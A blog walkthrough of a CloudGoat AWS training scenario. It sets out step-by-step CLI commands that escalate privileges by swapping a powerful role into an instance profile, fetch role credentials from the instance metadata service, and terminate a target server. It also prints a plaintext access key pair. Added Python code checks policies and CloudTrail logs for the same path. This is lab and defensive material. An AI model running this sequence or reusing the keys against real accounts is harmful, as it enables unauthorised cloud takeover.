Cloudgoat AWS CTF solution - Scenario 5 (iam_privesc_by_attachment)

n00🔑
Oct 19, 2022

Scenario: iam_privesc_by_attachment

Deployment:

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py create iam_privesc_by_attachment
Add the access key CloudGoat generates for the start user to ~/.aws/credentials as a named profile (this walkthrough uses the profile name “kerrigan”).

Scenario Resources

  • 1 VPC with: EC2 x 1
  • 1 IAM User

Scenario Start(s)

  1. IAM User “Kerrigan”

Scenario Goal(s)

Delete the EC2 instance “cg-super-critical-security-server”

Summary

Starting with a very limited set of permissions, the attacker is able to leverage the instance-profile-attachment permissions to create a new EC2 instance with significantly greater privileges than their own. With access to this new EC2 instance, the attacker gains full administrative powers within the target account and is able to accomplish the scenario’s goal — deleting the cg-super-critical-security-server and paving the way for further nefarious actions.

Exploitation Route(s)

Walkthrough — IAM User “kerrigan”

  1. Starting as the IAM user “Kerrigan,” the attacker uses their limited privileges to explore the environment.

a. Used pacu’s “iam__bruteforce_permissions” module to enumerate permissions:

run iam__bruteforce_permissions
ec2:
describe_iam_instance_profile_associations
describe_instances
describe_security_groups
describe_subnets
describe_vpcs
get_associated_enclave_certificate_iam_roles
get_console_screenshot
get_host_reservation_purchase_preview

s3:
get_object_torrent
head_bucket

b. Setting up enumerate-iam to brute-force permissions:

git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam/
pip3 install -r requirements.txt
cd enumerate_iam
git clone https://github.com/aws/aws-sdk-js.git
python3 generate_bruteforce_tests.py

After cloning aws-sdk-js into the “enumerate_iam” folder, run the generate_bruteforce_tests.py script (it derives the list of API calls to try from the SDK).

c. Running “enumerate-iam”:

python3 enumerate-iam.py --access-key AKIA4SM4ZEUHX7V5LYEU --secret-key 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

2. Checking running EC2 instances using ec2:DescribeInstances:

aws ec2 describe-instances --region us-east-1 --profile kerrigan --output text

3. Checking available instance profiles:

aws iam list-instance-profiles --profile kerrigan

We found an interesting instance profile, “arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”, with the role “cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22” attached.

4. Let’s list roles, as we have the list-roles permission:

aws iam list-roles --profile kerrigan

We found two interesting roles:

cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 and cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22. Judging by the name, the “mighty” one seems more interesting.

5. Let’s try to add the “mighty” role to the instance profile.

Note: Our enumeration tools (pacu and enumerate-iam) were unable to detect these four permissions, because they only exercise read-only API calls:

“iam:AddRoleToInstanceProfile”, “iam:RemoveRoleFromInstanceProfile”, “ec2:AssociateIamInstanceProfile”, “ec2:RunInstances”

but upon checking manually I found our user has these additional permissions.

aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22  --profile kerrigan

We got an error: “Cannot exceed quota for InstanceSessionsPerInstanceProfile: 1” (an instance profile can hold only one role at a time). Let’s remove the existing attached role and then add the “mighty” role:

aws iam remove-role-from-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-meek-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan
aws iam add-role-to-instance-profile --instance-profile-name cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22 --role-name cg-ec2-mighty-role-iam_privesc_by_attachment_cgidztq4yffc22 --profile kerrigan

We didn’t get any error this time.
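The four permissions listed in the note above are the whole escalation: a principal that can attach a role to an instance profile and can also launch (or re-associate) an instance with that profile inherits whatever the attached role can do. One way to catch this combination in a policy before a user like kerrigan exists is a small policy checker. The script below is an added example written for this post, not code from CloudGoat or the original author: it expands IAM action wildcards, applies the explicit-Deny-wins rule, and runs over two constructed policies, one mirroring the permissions found above and one hardened with an explicit Deny on the attachment actions. The policy contents, the account id and the evaluator's simplifications (Condition, NotAction and Resource scoping are ignored) are assumptions.

```python
"""Flag IAM policies that grant the instance-profile attachment escalation path.

Added example; not part of the CloudGoat scenario or the original post.
Both policy documents are constructed: the first mirrors the four permissions
the walkthrough found on "kerrigan", the second is a hardened variant.
"""
import fnmatch
import json

# The four permissions named in step 5 of the walkthrough. Launching with a
# profile also needs iam:PassRole on the role, but the checker keeps to the
# page's list.
ESCALATION_ACTIONS = {
    "iam:AddRoleToInstanceProfile",
    "iam:RemoveRoleFromInstanceProfile",
    "ec2:AssociateIamInstanceProfile",
    "ec2:RunInstances",
}
# Either of these turns an attached role into usable credentials.
USE_ACTIONS = {"ec2:RunInstances", "ec2:AssociateIamInstanceProfile"}

# Constructed policy resembling the weak "kerrigan" permissions.
VULNERABLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["ec2:Describe*", "iam:List*", "iam:Get*"], "Resource": "*"},
    {"Effect": "Allow",
     "Action": ["iam:AddRoleToInstanceProfile", "iam:RemoveRoleFromInstanceProfile",
                "ec2:AssociateIamInstanceProfile", "ec2:RunInstances", "ec2:CreateKeyPair"],
     "Resource": "*"}
  ]
}""")

# Hardened variant (constructed): launching is still allowed, but the
# role-attachment actions are explicitly denied, so no stronger role can be
# swapped into a profile the user is able to launch with.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["ec2:Describe*", "iam:List*", "iam:Get*"], "Resource": "*"},
    {"Effect": "Allow", "Action": ["ec2:RunInstances", "ec2:AssociateIamInstanceProfile"], "Resource": "*"},
    {"Effect": "Deny",
     "Action": ["iam:AddRoleToInstanceProfile", "iam:RemoveRoleFromInstanceProfile"],
     "Resource": "*"}
  ]
}""")


def _as_list(value):
    # IAM allows a bare string wherever a list is accepted.
    return value if isinstance(value, list) else [value]


def _matches(action, pattern):
    # IAM action names match case-insensitively; "*" and "?" are the wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def allowed_actions(policy, candidates):
    """Return the subset of `candidates` the policy allows.

    Simplified evaluator: an explicit Deny beats any Allow; Condition, NotAction
    and Resource scoping are ignored (everything is treated as in scope).
    """
    allowed, denied = set(), set()
    for stmt in _as_list(policy["Statement"]):
        if "Action" not in stmt:  # NotAction statements are out of scope here
            continue
        bucket = allowed if stmt["Effect"] == "Allow" else denied
        for pattern in _as_list(stmt["Action"]):
            bucket.update(a for a in candidates if _matches(a, pattern))
    return allowed - denied


def escalation_findings(policy):
    """Report whether the policy grants both halves of the attachment path:
    attaching a role to a profile, and then using that profile."""
    granted = allowed_actions(policy, ESCALATION_ACTIONS)
    can_attach = "iam:AddRoleToInstanceProfile" in granted
    use_via = sorted(granted & USE_ACTIONS)
    return {
        "escalation": can_attach and bool(use_via),
        "granted": sorted(granted),
        "use_via": use_via,
    }


if __name__ == "__main__":
    for name, policy in (("vulnerable", VULNERABLE_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, escalation_findings(policy))
```

The checker deliberately reports the `granted` set as well as the verdict, because the Remove permission on its own is harmless and RunInstances on its own is routine; it is the pairing with AddRoleToInstanceProfile that matters. Scoping the attachment actions by Resource would not help here, since the resource of AddRoleToInstanceProfile is the instance profile, not the role being attached.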

6. Now we can use the “AssociateIamInstanceProfile” permission to associate this profile (“cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgidztq4yffc22”) with the running EC2 instance.

aws ec2 associate-iam-instance-profile --iam-instance-profile file://instance_profile.json --instance-id "i-0f1a8f37275d27fcd" --profile kerrigan --region us-east-1

(instance_profile.json holds the profile reference in the CLI’s IamInstanceProfileSpecification format, i.e. its Arn and/or Name.)

7. Now we are ready to spin up an EC2 instance with full permissions.

a) Creating an EC2 SSH key pair:

aws ec2 create-key-pair --key-name pwned --profile kerrigan --query 'KeyMaterial' --region us-east-1 --output text > pwned.pem

b) Running the EC2 instance:

aws ec2 describe-security-groups --profile kerrigan --region us-east-1
aws ec2 describe-subnets --profile kerrigan --region us-east-1
aws ec2 run-instances --image-id ami-0a313d6098716f372 --instance-type t2.micro --iam-instance-profile Arn=arn:aws:iam::864154101007:instance-profile/cg-ec2-meek-instance-profile-iam_privesc_by_attachment_cgid7c11loyvlf --key-name pwned --profile kerrigan --subnet-id subnet-07be3953f5accbd47 --security-group-ids sg-0523b1376503ede0a --region us-east-1
Then use describe-instances to get the public IP.
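From the defender's side, steps 5 to 7 leave a recognisable trail in CloudTrail: RemoveRoleFromInstanceProfile, then AddRoleToInstanceProfile with a different role on the same profile, then RunInstances (or AssociateIamInstanceProfile, as in step 6) referencing that profile, all from the same principal within minutes. The detector below is an added example and not part of the original post or of CloudGoat: it runs that correlation over constructed CloudTrail-style records. The account id, the role and profile names, the time window and the trimmed record shape (in particular `requestParameters.iamInstanceProfile.arn` on the launch event) are assumptions made for the example.

```python
"""Correlate CloudTrail events for the instance-profile role-swap escalation.

Added example; not from the original post or the CloudGoat project. The
records below are constructed to mirror the walkthrough and are trimmed to
the fields the detector needs; account id, ARNs and names are placeholders.
"""
from collections import defaultdict
from datetime import datetime, timedelta

ACTOR = "arn:aws:iam::111122223333:user/kerrigan"  # constructed principal
PROFILE_ARN = "arn:aws:iam::111122223333:instance-profile/cg-ec2-meek-instance-profile"

# Constructed CloudTrail-style records (not real log output).
SAMPLE_EVENTS = [
    {"eventTime": "2022-10-19T10:00:05Z", "eventSource": "iam.amazonaws.com",
     "eventName": "RemoveRoleFromInstanceProfile", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile",
                           "roleName": "cg-ec2-meek-role"}},
    {"eventTime": "2022-10-19T10:00:09Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AddRoleToInstanceProfile", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"instanceProfileName": "cg-ec2-meek-instance-profile",
                           "roleName": "cg-ec2-mighty-role"}},
    {"eventTime": "2022-10-19T10:03:40Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "RunInstances", "userIdentity": {"arn": ACTOR},
     "requestParameters": {"iamInstanceProfile": {"arn": PROFILE_ARN}}},
    # Benign: an admin attaches a role to a different profile and launches nothing.
    {"eventTime": "2022-10-19T11:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AddRoleToInstanceProfile",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/admin"},
     "requestParameters": {"instanceProfileName": "web-profile", "roleName": "web-role"}},
]


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _profile_used(event):
    """Instance profile name referenced by a launch/associate call.

    Assumes the constructed shape requestParameters.iamInstanceProfile.{arn|name};
    the name is the last path segment of the ARN.
    """
    profile = (event.get("requestParameters") or {}).get("iamInstanceProfile") or {}
    if "name" in profile:
        return profile["name"]
    if "arn" in profile:
        return profile["arn"].rsplit("/", 1)[-1]
    return None


def find_role_swap_escalations(events, window=timedelta(minutes=30)):
    """Return one finding per AddRoleToInstanceProfile that the same principal
    follows, within `window`, by launching or associating with that profile.
    A preceding RemoveRoleFromInstanceProfile on the same profile (the quota
    workaround in step 5) raises the severity."""
    by_actor = defaultdict(list)
    for event in sorted(events, key=_ts):
        by_actor[event["userIdentity"]["arn"]].append(event)

    findings = []
    for actor, evs in by_actor.items():
        for i, add in enumerate(evs):
            if add["eventName"] != "AddRoleToInstanceProfile":
                continue
            profile = add["requestParameters"]["instanceProfileName"]
            removed = [e["requestParameters"]["roleName"] for e in evs[:i]
                       if e["eventName"] == "RemoveRoleFromInstanceProfile"
                       and e["requestParameters"]["instanceProfileName"] == profile
                       and _ts(add) - _ts(e) <= window]
            used = [e for e in evs[i + 1:]
                    if e["eventName"] in ("RunInstances", "AssociateIamInstanceProfile")
                    and _profile_used(e) == profile
                    and _ts(e) - _ts(add) <= window]
            if used:
                findings.append({
                    "actor": actor,
                    "profile": profile,
                    "swapped_out": removed[-1] if removed else None,
                    "swapped_in": add["requestParameters"]["roleName"],
                    "followed_by": used[0]["eventName"],
                    "severity": "high" if removed else "medium",
                })
    return findings


if __name__ == "__main__":
    for finding in find_role_swap_escalations(SAMPLE_EVENTS):
        print(finding)
```

The same rule ports directly to a CloudTrail Lake or SIEM query: group by `userIdentity.arn`, look for AddRoleToInstanceProfile, and join on a subsequent RunInstances or AssociateIamInstanceProfile whose profile name matches. A lone AddRoleToInstanceProfile by an administrator is normal change activity, which is why the detector only fires when the profile is then used.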

8. Logging in and fetching credentials from this instance:

ssh -i pwned.pem ubuntu@54.145.230.120
curl 169.254.169.254/latest/meta-data/iam/security-credentials/

OR

We can install the AWS CLI directly within the EC2 instance and run the commands from there.

9. Using these credentials to delete “cg-super-critical-security-server”:

# Determining the instance id
aws ec2 describe-instances --region us-east-1 --profile ec2_role

i-0064345de3f005c7a

aws ec2 terminate-instances --instance-ids i-0064345de3f005c7a --region us-east-1 --profile ec2_role

References:

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/iam_privesc_by_attachment/README.md
